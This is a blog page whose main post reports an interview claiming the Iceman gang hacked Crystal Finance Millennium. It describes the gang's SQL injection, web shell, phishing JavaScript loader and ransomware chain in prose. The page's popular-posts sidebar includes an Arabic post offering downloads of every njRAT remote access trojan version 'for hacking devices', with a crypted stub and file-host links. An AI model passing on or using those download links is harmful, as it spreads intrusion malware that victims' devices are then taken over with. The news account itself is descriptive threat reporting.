Is ICEMAN behind the malware-based attack on Crystal Finance Millennium؟


Exclusive – The Iceman gang taking responsibility for infecting Crystal Finance Millennium, the journalist Marc Miller interviewd one of the members of the crew.

Iceman gang member confirms that they are behind the introduction and spreading of malware that infected the systems at Crystal Finance Millennium.
In Septemeber security experts at TrendMicro reported that the Ukraine based Account Firm, Crystal Finance Millennium (CFM), has been hacked and is found to be distributing malware.
The incident caused the firm to take down its website to stop spreading the threat.
Crystal Finance Millennium ICEMAN
Crystal Finance Millennium attack (Source Trend Micro)
Marc Miller had a chance to speak to one of the gang members on XMMP and he confirmed that the Iceman group is behind this attack. They started with a simple web attack (SQLI which lead to web shell upload, no privilege escalation was needed) in order to gain access to the web servers of the company.
He confirmed that the math was simple, the Ukrainian company had many clients in the financial and medical sector which facilitated the propagation of their malware. From the archived web page, it becomes apparent they provide accounting software, personalization of medical records, blood service and “full automation of the doctor’s office” – contrary to what their company name suggests, it appears they are (mostly) focused on medical software.
The group sent phishing emails to various targets based in Ukraine and former Soviet countries. The emails contained a ZIP file that, in turn, contained a JavaScript file. When users unzipped the archive and ran the JS file, the script would download a file named load.exe from the CFM’s web server.
The loader (load.exe file) will, later on, download a Purge ransomware that was modified for that operation by the Iceman group. According to the gang, each target was treated individually to maximize profit. Sometimes they would run a ransomware program and sometimes they would run a banking Trojan. “When you sophisticate your attack, you can drain the sharks” – he said.
An inclusive interview is in the making to unveil the course of this attack. It will be released in the upcoming weeks.

About the Author: Marc Miller
Marc Miller is a web journalist, focused on cybercrime.
He started a blog called: THE PURPLE HAT – Cyber Gangs NAKED, dedicated to exposing the methods and works of cybercrime gangs such as “CARBANAK” or similar sophisticated syndicated Cybercrime organizations.
In the past. he worked as a web front-end programmer. Also, he is passionate about hardware, hacking, security and marketing.

Comments

Post a Comment

Popular posts from this blog

تحميل اصدارات برنامج njRAT لاختراق الاجهزة 2017

Image
تحميل   اصدارات برنامج  njRAT  لاختراق الاجهزة  2017 ---------------------------------------------------------------------------------------------- السلام عليكم ورحمة الله تعالى وبركاته تحميل جميع اصدارات برنامج  njRAT  الشهير لاختراق الاجهزة مع تشفيرة متواضعة  لستب njRAT 5 نتيجة فحص تشفيرة الستب http://pscan.xyz/results.php?id=VbGXRoAJjWiEeSHH الان ناتي الى التحميل njRAT_v0.3.5 للتحميل https://up.top4top.net/downloadf-483nr2oz4-rar.html njRAT_v0.4.1 https://up.top4top.net/downloadf-483nhv6j2-rar.html njRAT_v0.5.0 للتحميل https://up.top4top.net/downloadf-483nihol1-rar.html njRAT-v0.6.4 للتحميل https://up.top4top.net/downloadf-483dr2zk1-rar.html njRAT-v0.7d
Read more

Cybersecurity in 2018: Three predictions and one hope

Image
Effective cybersecurity means keeping a close eye on the threats you currently face, and an even closer eye on the threats to come. As you consider your security strategy and investments for the coming year, here are three key trends that will define the threat landscape in 2018, and one hope for a more effective approach to protection.  Risk will continue to shift from infrastructure to the application layer As web apps have evolved from basic information and ecommerce functionality to full-fledged online services, their code and customer data have made them an increasingly appealing target for hackers. Not only are they accessible via the open Internet—they’re also woefully underprotected, with the application layer drawing only 3 percent of the typical security budget at a time when it accounts for 30 percent of successful breaches, according to Verizon. While an incident of the magnitude of the Equifax breach can hardly be said to have a silver lining, at
Read more

Which phishing messages have a near 100% click rate?

Image
Training employees to spot phishing emails, messages and phone calls can’t be done just once or once a year if the organization wants to see click rates decrease. For one thing, employees come and go (and change roles) with regularity. Secondly, threats change over time. Thirdly, knowledge and practices that aren’t regularly reinforced will be lost. And, finally, awareness isn’t the same as knowledge. “Just knowing a threat exists isn’t the same as knowing how to recognize and respond to a threat when it presents itself. In-depth education about phishing prevention is needed to create lasting behavior change,” Wombat Security researchers point out. The statistics included in the company’s latest annual State of the Phish report show the difference made by both the tools used to train end users to recognize and avoid phishing attacks and how often they are used. In the US, most organizations use computer-based online security awareness training and simulated
Read more